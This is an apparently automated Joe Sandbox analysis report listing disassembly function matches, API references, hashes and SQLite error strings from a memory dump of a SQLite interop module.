                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DebugOutputString$__snprintf_memset
                                                                                                                                                                                                                                      • String ID: <unknown>$done with cleanup.$eeeSdk1: %s HRESULT 0x%016X$invalid ICLRRuntimeHost pointer.$invalid ICLRRuntimeHost.
                                                                                                                                                                                                                                      • API String ID: 543257962-3439405060
                                                                                                                                                                                                                                      • Opcode ID: a8781807804408e63d587baed2692a4c32ffbacee2a751fb94bd432590c03a97
                                                                                                                                                                                                                                      • Instruction ID: 30833f6e3fba17430b4cac42866e69c5b811c1cf771ffd3ce7660d77e4e63b61
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8781807804408e63d587baed2692a4c32ffbacee2a751fb94bd432590c03a97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11C432E10218EBD710EFB5DC41AADB379EF89320F45419DEA489B240DB38DD068BD1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,6BC8DA3D,00000000,?,?,?,6BCA0307,6BC8DA3D,?), ref: 6BC99750
                                                                                                                                                                                                                                        • Part of subcall function 6BCC0600: SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,00000000,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000,?), ref: 6BCC062D
                                                                                                                                                                                                                                        • Part of subcall function 6BCC0600: SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001590B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000), ref: 6BCC064B
                                                                                                                                                                                                                                      • SI1bfe410acac3c9be.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,6BC8DA3D,00000000,?,?,?,6BCA0307,6BC8DA3D), ref: 6BC9977F
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC9984C
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,?,?,?,6BC8DA3D,00000000,?,?,?,6BCA0307,6BC8DA3D,?), ref: 6BC998A8
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BC9992F
                                                                                                                                                                                                                                      • SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000004), ref: 6BC99A3E
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC99A85
                                                                                                                                                                                                                                      • SI8259474343588db4.SQLITE.INTEROP(?,00000004,?), ref: 6BC99AA8
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BC99AC6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat4, xrefs: 6BC998D1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Ia364946505687432.$I769271af19a2299d._memset$I1bfe410acac3c9be.I25ca8d2baaee0750.I8259474343588db4.
                                                                                                                                                                                                                                      • String ID: SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat4
                                                                                                                                                                                                                                      • API String ID: 2982167675-1240430669
                                                                                                                                                                                                                                      • Opcode ID: 5828d3002ee8b096c00a2149c82ac21443de6668fd2b153a2f3e3362932813ae
                                                                                                                                                                                                                                      • Instruction ID: f2e9b44ff7e2d26a3b8db28956db7b20ceb00bc16c1a58de7829106514459342
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5828d3002ee8b096c00a2149c82ac21443de6668fd2b153a2f3e3362932813ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4C1B7B1E213006BEB10DF75AC82F6B73B99F84714F144469ED159B242FA79EB01C7A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CB0A
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,unopened), ref: 6BC5CC4E
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CC6C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unopened
                                                                                                                                                                                                                                      • API String ID: 2981141233-857223478
                                                                                                                                                                                                                                      • Opcode ID: 20643edc26a75a5d6015af276f0ea260a48c990cc91754540ed31d08572bf983
                                                                                                                                                                                                                                      • Instruction ID: 855c28a80c80329d9638e4ef30331e9e808ed8c3137eeba72132b4d128aa7aa9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20643edc26a75a5d6015af276f0ea260a48c990cc91754540ed31d08572bf983
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37512772A257018BD710CF39D841B0777E4EF45724F0046A9E899DB241F73DEA7887AA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,?,?,?,6BC5F131), ref: 6BC5909D
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015B91,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC590BB
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,bind on a busy prepared statement: [%s],?), ref: 6BC5911A
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015B99,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC59138
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-111843438
                                                                                                                                                                                                                                      • Opcode ID: ec01a23d9ddf7f965a5ff73752596e300e2a91167fc177a5a603ea6d239dcfe2
                                                                                                                                                                                                                                      • Instruction ID: 999d3755a2bcb299a28d11076561fbf92d89f47feaefce9cbabbf73714a342f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec01a23d9ddf7f965a5ff73752596e300e2a91167fc177a5a603ea6d239dcfe2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F03106B17206019BFB108F38DC89F4777A0AB80319F1005A9E55A9F282FB7DD66497A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C87E
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,unopened), ref: 6BC5C8E6
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5C904
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unopened
                                                                                                                                                                                                                                      • API String ID: 2981141233-857223478
                                                                                                                                                                                                                                      • Opcode ID: 59bb416e5446d7918cbe108d245f1563c4f16525aed39b9e7298b0e79d011841
                                                                                                                                                                                                                                      • Instruction ID: c268d5cb5ddb368153263edcce873897254dc8a53548144c22e81dbadf13b2bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59bb416e5446d7918cbe108d245f1563c4f16525aed39b9e7298b0e79d011841
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7210837B652117BDB005B799C42F873795AF81B39B0500B5EA19EF282FE2CD63442B6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,?,00000001,?,?,?), ref: 6BCC1ACD
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AE1
                                                                                                                                                                                                                                      • SI06ad3f4f233fab5b.SQLITE.INTEROP(00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1AFE
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000000,6BCDE566), ref: 6BCC1CAA
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A76F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 6BCC1CE7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BCC1CE0
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC1CD1
                                                                                                                                                                                                                                      • misuse, xrefs: 6BCC1CDB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Ia364946505687432.$I06ad3f4f233fab5b.I769271af19a2299d.I8c5d6a3d79dd16ae.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 973435178-160653349
                                                                                                                                                                                                                                      • Opcode ID: b48a0f963a6dee8e9d56e60f82508632592a53bffd3d40a9017711e7d003979e
                                                                                                                                                                                                                                      • Instruction ID: e34b4c5be8046d20cc874269508331d779687624d755f013657763901326c74d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b48a0f963a6dee8e9d56e60f82508632592a53bffd3d40a9017711e7d003979e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60C1F7B5B252159BE700CF2AD880B6773A9EF94714F0444A9FD088B341F739EE41CBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1FD9
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BCE21E5
                                                                                                                                                                                                                                        • Part of subcall function 6BCCB710: SIdb45e174afb28e2c.SQLITE.INTEROP(PRAGMA '%q'.table_info('%q'),?,?,00000000,00000000,?,?,?,?,00000000,?,?), ref: 6BCCB734
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BCE2121
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(table schemas do not match), ref: 6BCE213C
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE222F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.$Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$table schemas do not match
                                                                                                                                                                                                                                      • API String ID: 2647412588-4182254272
                                                                                                                                                                                                                                      • Opcode ID: b8b6b97cb9da47d8d8fff96b09705e3b0995842512c4dccd52e80ac05b186879
                                                                                                                                                                                                                                      • Instruction ID: e76e0159f32935b7186745fb914bf3b3b17a66b6b1c6950f591920d42617c8e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8b6b97cb9da47d8d8fff96b09705e3b0995842512c4dccd52e80ac05b186879
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7391A0B56143019FD300CF69D881A1BB7E5BFC8358F04496CF9999B341E779EA05CBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1BAB
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,unopened), ref: 6BCE1C78
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1C96
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unopened
                                                                                                                                                                                                                                      • API String ID: 2981141233-3178044766
                                                                                                                                                                                                                                      • Opcode ID: e65bde1f618fb96648b3020c60440fc945383b242ebe22757576fc0ebdf1c828
                                                                                                                                                                                                                                      • Instruction ID: a4123130cec08fd08c9857ef30b2c22d63286af0b2aa34ff752a72f535b5931f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e65bde1f618fb96648b3020c60440fc945383b242ebe22757576fc0ebdf1c828
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A61E4B0511720CBEB019F6DD84AA8677A4BF02719F440068E969DF201F73DD667CBB2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC2DE7E
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DEAB
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DEB7
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC2DEC0
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DF1F
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DF2B
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC2DF34
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID: out of memory$unrecognized character
                                                                                                                                                                                                                                      • API String ID: 1480580083-3687618476
                                                                                                                                                                                                                                      • Opcode ID: 8f87d7438ed5265e72a5b45a98bc9e47a8340500cec005de23b9664c52266180
                                                                                                                                                                                                                                      • Instruction ID: 73a4277e47ad847f45992219ff1ea492ba5b2a3a0e15cbc681b2829ccee1aab7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f87d7438ed5265e72a5b45a98bc9e47a8340500cec005de23b9664c52266180
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9517871A657400BD3218E38980175BB3959F9136CF1406ADF889CB381FB3EEB4683D2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIe969e8d8137a8a33.SQLITE.INTEROP ref: 6BC47B56
                                                                                                                                                                                                                                      • SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC47B84
                                                                                                                                                                                                                                      • SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47B93
                                                                                                                                                                                                                                      • SI28687b581b626bbf.SQLITE.INTEROP(?), ref: 6BC47BA6
                                                                                                                                                                                                                                      • SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47BE5
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC47BF8
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC47C13
                                                                                                                                                                                                                                      • SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47C85
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC47CAC
                                                                                                                                                                                                                                      • SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47D01
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
